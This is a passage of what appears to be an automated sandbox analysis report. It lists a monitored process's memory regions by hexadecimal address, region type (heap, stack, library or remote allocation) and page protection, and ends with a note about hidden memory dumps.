trusted library allocation
|
page read and write
|
||
|
158A71C0000
|
heap
|
page read and write
|
||
|
1169B7CC000
|
trusted library allocation
|
page read and write
|
||
|
71DCFE000
|
stack
|
page read and write
|
||
|
35CA000
|
trusted library allocation
|
page read and write
|
||
|
13D0000
|
trusted library allocation
|
page read and write
|
||
|
71DEFE000
|
stack
|
page read and write
|
||
|
158C115C000
|
heap
|
page read and write
|
||
|
7F2E000
|
stack
|
page read and write
|
||
|
1169AAC0000
|
trusted library allocation
|
page read and write
|
||
|
3505000
|
trusted library allocation
|
page read and write
|
||
|
D69000
|
stack
|
page read and write
|
||
|
7A99000
|
trusted library allocation
|
page read and write
|
||
|
32C9000
|
trusted library allocation
|
page read and write
|
||
|
1FD2073B000
|
heap
|
page read and write
|
||
|
1FD20764000
|
heap
|
page read and write
|
||
|
1FD206D9000
|
heap
|
page read and write
|
||
|
2F6B000
|
stack
|
page read and write
|
||
|
1FD223D1000
|
heap
|
page read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
432000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
|
3223000
|
trusted library allocation
|
page read and write
|
||
|
116948B0000
|
trusted library allocation
|
page read and write
|
||
|
FA33B7000
|
stack
|
page read and write
|
||
|
76F0000
|
trusted library allocation
|
page read and write
|
||
|
1FD223EA000
|
heap
|
page read and write
|
||
|
3425000
|
trusted library allocation
|
page read and write
|
||
|
1FD2073F000
|
heap
|
page read and write
|
||
|
1FD20791000
|
heap
|
page read and write
|
||
|
54CD000
|
trusted library allocation
|
page read and write
|
||
|
158A725D000
|
heap
|
page read and write
|
||
|
158A73E0000
|
heap
|
page read and write
|
||
|
121E000
|
stack
|
page read and write
|
||
|
6A0E000
|
trusted library allocation
|
page read and write
|
||
|
54AB000
|
trusted library allocation
|
page read and write
|
||
|
1169BE92000
|
trusted library allocation
|
page read and write
|
||
|
1450000
|
heap
|
page read and write
|
||
|
7950000
|
heap
|
page read and write
|
||
|
116A811D000
|
trusted library allocation
|
page read and write
|
||
|
322B000
|
trusted library allocation
|
page read and write
|
||
|
33C2000
|
trusted library allocation
|
page read and write
|
||
|
141B000
|
trusted library allocation
|
page execute and read and write
|
||
|
32C1000
|
trusted library allocation
|
page read and write
|
||
|
4132000
|
trusted library allocation
|
page read and write
|
||
|
6DFC000
|
stack
|
page read and write
|
||
|
13E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B944000
|
trusted library allocation
|
page read and write
|
||
|
3FC1000
|
trusted library allocation
|
page read and write
|
||
|
314A000
|
trusted library allocation
|
page read and write
|
||
|
1406000
|
trusted library allocation
|
page execute and read and write
|
||
|
158A8BE5000
|
trusted library allocation
|
page read and write
|
||
|
1FD2072E000
|
heap
|
page read and write
|
||
|
11696057000
|
trusted library allocation
|
page read and write
|
||
|
71DBFE000
|
stack
|
page read and write
|
||
|
31DF000
|
trusted library allocation
|
page read and write
|
||
|
69D2000
|
trusted library allocation
|
page read and write
|
||
|
3113000
|
trusted library allocation
|
page read and write
|
||
|
158A70A0000
|
heap
|
page read and write
|
||
|
1FD20754000
|
heap
|
page read and write
|
||
|
7FFD9B792000
|
trusted library allocation
|
page read and write
|
||
|
1FD223E6000
|
heap
|
page read and write
|
||
|
71DC7C000
|
stack
|
page read and write
|
||
|
1FD20731000
|
heap
|
page read and write
|
||
|
5550000
|
heap
|
page read and write
|
||
|
21B9FFE000
|
stack
|
page read and write
|
||
|
116945F6000
|
heap
|
page read and write
|
||
|
1FD223D4000
|
heap
|
page read and write
|
||
|
11695F10000
|
trusted library allocation
|
page read and write
|
||
|
58E0000
|
heap
|
page read and write
|
||
|
2F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
593C000
|
heap
|
page read and write
|
||
|
6980000
|
trusted library allocation
|
page read and write
|
||
|
69B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
40B3000
|
trusted library allocation
|
page read and write
|
||
|
6F93000
|
trusted library allocation
|
page read and write
|
||
|
5873000
|
heap
|
page execute and read and write
|
||
|
7724000
|
trusted library allocation
|
page read and write
|
||
|
11695F00000
|
heap
|
page readonly
|
||
|
7F6F000
|
stack
|
page read and write
|
||
|
1FD2071F000
|
heap
|
page read and write
|
||
|
1FD20945000
|
heap
|
page read and write
|
||
|
78AE000
|
heap
|
page read and write
|
||
|
FFA617F000
|
stack
|
page read and write
|
||
|
116948E4000
|
heap
|
page read and write
|
||
|
40AD000
|
trusted library allocation
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
FA2D6E000
|
stack
|
page read and write
|
||
|
FA36BE000
|
stack
|
page read and write
|
||
|
158A73ED000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
31AC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
1270000
|
heap
|
page read and write
|
||
|
116948E0000
|
heap
|
page read and write
|
||
|
158A726E000
|
heap
|
page read and write
|
||
|
5976000
|
heap
|
page read and write
|
||
|
3211000
|
trusted library allocation
|
page read and write
|
||
|
1169B58C000
|
trusted library allocation
|
page read and write
|
||
|
25F6CE10000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
3465000
|
trusted library allocation
|
page read and write
|
||
|
5AFE000
|
stack
|
page read and write
|
||
|
5930000
|
heap
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
FA353E000
|
stack
|
page read and write
|
||
|
4052000
|
trusted library allocation
|
page read and write
|
||
|
633E000
|
stack
|
page read and write
|
||
|
1FD20754000
|
heap
|
page read and write
|
||
|
5870000
|
heap
|
page execute and read and write
|
||
|
69C6000
|
trusted library allocation
|
page read and write
|
||
|
10F7000
|
stack
|
page read and write
|
||
|
25F6CEB0000
|
heap
|
page read and write
|
||
|
35BC000
|
trusted library allocation
|
page read and write
|
||
|
78CD000
|
heap
|
page read and write
|
||
|
65FE000
|
stack
|
page read and write
|
||
|
158A8C2E000
|
trusted library allocation
|
page read and write
|
||
|
25F70E62000
|
heap
|
page read and write
|
||
|
1FD20722000
|
heap
|
page read and write
|
||
|
552E000
|
trusted library allocation
|
page read and write
|
||
|
1FD20729000
|
heap
|
page read and write
|
||
|
21B9B2A000
|
stack
|
page read and write
|
||
|
13D4000
|
trusted library allocation
|
page read and write
|
||
|
158A8FB0000
|
trusted library allocation
|
page read and write
|
||
|
116963C3000
|
trusted library allocation
|
page read and write
|
||
|
437000
|
remote allocation
|
page execute and read and write
|
||
|
54BE000
|
trusted library allocation
|
page read and write
|
||
|
697A000
|
trusted library allocation
|
page read and write
|
There are 745 hidden memdumps, click here to show them.